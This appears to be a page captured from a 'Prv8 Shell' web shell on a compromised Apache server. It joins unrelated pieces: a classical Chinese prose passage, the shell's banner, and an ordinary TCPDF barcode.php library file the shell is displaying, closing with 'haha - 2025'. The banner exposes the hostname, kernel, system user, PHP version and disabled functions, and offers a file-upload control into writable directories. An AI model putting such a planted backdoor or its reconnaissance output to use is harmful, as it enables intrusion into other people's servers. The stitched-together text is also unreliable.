晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/akaindir/www/crm/libraries/tcpdf/barcode/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/akaindir/www/crm/libraries/tcpdf/barcode/barcode.php
<?php
//============================================================+
// File name   : barcode.php
// Begin       : 2002-07-31
// Last Update : 2005-01-02
// Author      : Karim Mribti [barcode@mribti.com]
// Version     : 1.1 [0.0.8a (original code)]
// License     : GNU LGPL (Lesser General Public License) 2.1
//               http://www.gnu.org/copyleft/lesser.txt
// Source Code : http://www.mribti.com/barcode/
//
// Description : Generic Barcode Render Class for PHP using
//               the GD graphics library.
//
// NOTE:
// This version contains changes by Nicola Asuni:
//  - porting to PHP5
//  - code style and formatting
//  - automatic php documentation in PhpDocumentor Style
//    (www.phpdoc.org)
//  - minor bug fixing
//  - $mCharSet and $mChars variables were added here
//============================================================+

/**
 * Barcode Render Class for PHP using the GD graphics library.
 * @author Karim Mribti, Nicola Asuni
 * @name BarcodeObject
 * @package com.tecnick.tcpdf
 * @version 0.0.8a 2001-04-01 (original code)
 * @since 2001-03-25
 * @license http://www.gnu.org/copyleft/lesser.html LGPL
 */

// Styles
// Global

/**
 * option: generate barcode border
 */
define("BCS_BORDER", 1);

/**
 * option: use transparent background
 */
define("BCS_TRANSPARENT", 2);

/**
 * option: center barcode
 */
define("BCS_ALIGN_CENTER", 4);

/**
 * option: align left
 */
define("BCS_ALIGN_LEFT", 8);

/**
 * option: align right
 */
define("BCS_ALIGN_RIGHT", 16);

/**
 * option: generate JPEG image
 */
define("BCS_IMAGE_JPEG", 32);

/**
 * option: generate PNG image
 */
define("BCS_IMAGE_PNG", 64);

/**
 * option: draw text
 */
define("BCS_DRAW_TEXT", 128);

/**
 * option: stretch text
 */
define("BCS_STRETCH_TEXT", 256);

/**
 * option: reverse color
 */
define("BCS_REVERSE_COLOR", 512);

/**
 * option: draw check
 * (only for I25 code)
 */
define("BCS_I25_DRAW_CHECK", 2048);

/**
 * set default background color
 */
define("BCD_DEFAULT_BACKGROUND_COLOR", 0xFFFFFF);

/**
 * set default foreground color
 */
define("BCD_DEFAULT_FOREGROUND_COLOR", 0x000000);

/**
 * set default style options
 */
define("BCD_DEFAULT_STYLE", BCS_BORDER | BCS_ALIGN_CENTER | BCS_IMAGE_PNG);

/**
 * set default width
 */
define("BCD_DEFAULT_WIDTH", 460);

/**
 * set default height
 */
define("BCD_DEFAULT_HEIGHT", 120);

/**
 * set default font
 */
define("BCD_DEFAULT_FONT", 5);

/**
 * st default horizontal resolution
 */
define("BCD_DEFAULT_XRES", 2);

// Margins

/**
 * set default margin
 */
define("BCD_DEFAULT_MAR_Y1", 0);

/**
 * set default margin
 */
define("BCD_DEFAULT_MAR_Y2", 0);

/**
 * set default text offset
 */
define("BCD_DEFAULT_TEXT_OFFSET", 2);

// For the I25 Only

/**
 * narrow bar option
 * (only for I25 code)
 */
define("BCD_I25_NARROW_BAR", 1);

/**
 * wide bar option
 * (only for I25 code)
 */
define("BCD_I25_WIDE_BAR", 2);

// For the C39 Only

/**
 * narrow bar option
 * (only for c39 code)
 */
define("BCD_C39_NARROW_BAR", 1);

/**
 * wide bar option
 * (only for c39 code)
 */
define("BCD_C39_WIDE_BAR", 2);

// For Code 128

/**
 * set type 1 bar
 * (only for c128 code)
 */
define("BCD_C128_BAR_1", 1);

/**
 * set type 2 bar
 * (only for c128 code)
 */
define("BCD_C128_BAR_2", 2);

/**
 * set type 3 bar
 * (only for c128 code)
 */
define("BCD_C128_BAR_3", 3);

/**
 * set type 4 bar
 * (only for c128 code)
 */
define("BCD_C128_BAR_4", 4);

/**
 * Barcode Render Class for PHP using the GD graphics library.
 * @author Karim Mribti, Nicola Asuni
 * @name BarcodeObject
 * @package com.tecnick.tcpdf
 * @version 0.0.8a 2001-04-01 (original code)
 * @since 2001-03-25
 * @license http://www.gnu.org/copyleft/lesser.html LGPL
 */
class BarcodeObject {
	/**
	 * @var Image width in pixels.
	 * @access protected
	 */
	protected $mWidth;
	
	/**
	 * @var Image height in pixels.
	 * @access protected
	 */
	protected $mHeight;
	
	/**
	 * @var Numeric code for Barcode style.
	 * @access protected
	 */
	protected $mStyle;
	
	/**
	 * @var Background color.
	 * @access protected
	 */
	protected $mBgcolor;
	
	/**
	 * @var Brush color.
	 * @access protected
	 */
	protected $mBrush;
	
	/**
	 * @var Image object.
	 * @access protected
	 */
	protected $mImg;
	
	/**
	 * @var Numeric code for character font.
	 * @access protected
	 */
	protected $mFont;
	
	/**
	 * @var Error message.
	 * @access protected
	 */
	protected $mError;
	
	/**
	 * @var Character Set.
	 * @access protected
	 */
	protected $mCharSet;
	
	/**
	 * @var Allowed symbols.
	 * @access protected
	 */
	protected $mChars;

	/**
	 * Class Constructor.
	 * @param int $Width Image width in pixels.
	 * @param int $Height Image height in pixels. 
	 * @param int $Style Barcode style.
	 */
	public function __construct($Width=BCD_DEFAULT_WIDTH, $Height=BCD_DEFAULT_HEIGHT, $Style=BCD_DEFAULT_STYLE) {
		$this->mWidth = $Width;
		$this->mHeight = $Height;
		$this->mStyle = $Style;
		$this->mFont = BCD_DEFAULT_FONT;
		$this->mImg = ImageCreate($this->mWidth, $this->mHeight);
		$dbColor = $this->mStyle & BCS_REVERSE_COLOR ? BCD_DEFAULT_FOREGROUND_COLOR : BCD_DEFAULT_BACKGROUND_COLOR;
		$dfColor = $this->mStyle & BCS_REVERSE_COLOR ? BCD_DEFAULT_BACKGROUND_COLOR : BCD_DEFAULT_FOREGROUND_COLOR;
		$this->mBgcolor = ImageColorAllocate($this->mImg, ($dbColor & 0xFF0000) >> 16,
		($dbColor & 0x00FF00) >> 8, $dbColor & 0x0000FF);
		$this->mBrush = ImageColorAllocate($this->mImg, ($dfColor & 0xFF0000) >> 16,
		($dfColor & 0x00FF00) >> 8, $dfColor & 0x0000FF);
		if (!($this->mStyle & BCS_TRANSPARENT)) {
			ImageFill($this->mImg, $this->mWidth, $this->mHeight, $this->mBgcolor);
		}
	}
	
	/**
	 * Class Destructor.
	 * Destroy image object.
	 */
	public function __destructor() {
		$this->DestroyObject();
	}

	/**
	 * Returns the image object.
	 * @return object image.
	 * @author Nicola Asuni
	 * @since 1.5.2
	 */
	public function getImage() {
		return $this->mImg;
	}
	
	/**
	 * Abstract method used to draw the barcode image.
	 * @param int $xres Horizontal resolution.
	 */
	public function DrawObject($xres)	{
		/* there is not implementation neded, is simply the asbsract function. */
		return false;
	}
	
	/**
	 * Draws the barcode border.
	 * @access protected
	 */
	protected function DrawBorder() {
		ImageRectangle($this->mImg, 0, 0, $this->mWidth-1, $this->mHeight-1, $this->mBrush);
	}
	
	/**
	 * Draws the alphanumeric code.
	 * @param int $Font Font type.
	 * @param int $xPos Horiziontal position.
	 * @param int $yPos Vertical position.
	 * @param int $Char Alphanumeric code to write.
	 * @access protected
	 */
	protected function DrawChar($Font, $xPos, $yPos, $Char) {
		ImageString($this->mImg,$Font,$xPos,$yPos,$Char,$this->mBrush);
	}
	
	/**
	 * Draws a character string.
	 * @param int $Font Font type.
	 * @param int $xPos Horiziontal position.
	 * @param int $yPos Vertical position.
	 * @param int $Char string to write.
	 * @access protected
	 */
	protected function DrawText($Font, $xPos, $yPos, $Char) {
		ImageString($this->mImg,$Font,$xPos,$yPos,$Char,$this->mBrush);
	}

	/**
	 * Draws a single barcode bar.
	 * @param int $xPos Horiziontal position.
	 * @param int $yPos Vertical position.
	 * @param int $xSize Horizontal size.
     * @param int $xSize Vertical size.
     * @return bool trur in case of success, false otherwise.
     * @access protected
	 */
	protected function DrawSingleBar($xPos, $yPos, $xSize, $ySize) {
		if ($xPos>=0 && $xPos<=$this->mWidth && ($xPos+$xSize)<=$this->mWidth &&
		$yPos>=0 && $yPos<=$this->mHeight && ($yPos+$ySize)<=$this->mHeight) {
			for ($i=0;$i<$xSize;$i++) {
				ImageLine($this->mImg, $xPos+$i, $yPos, $xPos+$i, $yPos+$ySize, $this->mBrush);
			}
			return true;
		}
		return false;
	}
	
	/**
	 * Returns the current error message.
	 * @return string error message.
	 */
	public function GetError() {
		return $this->mError;
	}
	
	/**
	 * Returns the font height.
	 * @param int $font font type.
	 * @return int font height.
	 */
	public function GetFontHeight($font) {
		return ImageFontHeight($font);
	}
	
	/**
	 * Returns the font width.
	 * @param int $font font type.
	 * @return int font width.
	 */
	public function GetFontWidth($font) {
		return ImageFontWidth($font);
	}
	
	/**
	 * Set font type.
	 * @param int $font font type.
	 */
	public function SetFont($font) {
		$this->mFont = $font;
	}
	
	/**
	 * Returns barcode style.
	 * @return int barcode style.
	 */
	public function GetStyle() {
		return $this->mStyle;
	}

	/**
	 * Set barcode style.
	 * @param int $Style barcode style.
	 */
	public function SetStyle ($Style) {
		$this->mStyle = $Style;
	}

	/**
	 * Flush the barcode image.
	 */
	public function FlushObject() {
		if (($this->mStyle & BCS_BORDER)) {
			$this->DrawBorder();
		}
		if ($this->mStyle & BCS_IMAGE_PNG) {
			Header("Content-Type: image/png");
			ImagePng($this->mImg);
		} else if ($this->mStyle & BCS_IMAGE_JPEG) {
			Header("Content-Type: image/jpeg");
			ImageJpeg($this->mImg);
		}
	}
	
	/**
	 * Destroy the barcode image.
	 */
	public function DestroyObject() {
		ImageDestroy($this->mImg);
	}
}

//============================================================+
// END OF FILE
//============================================================+
?>

haha - 2025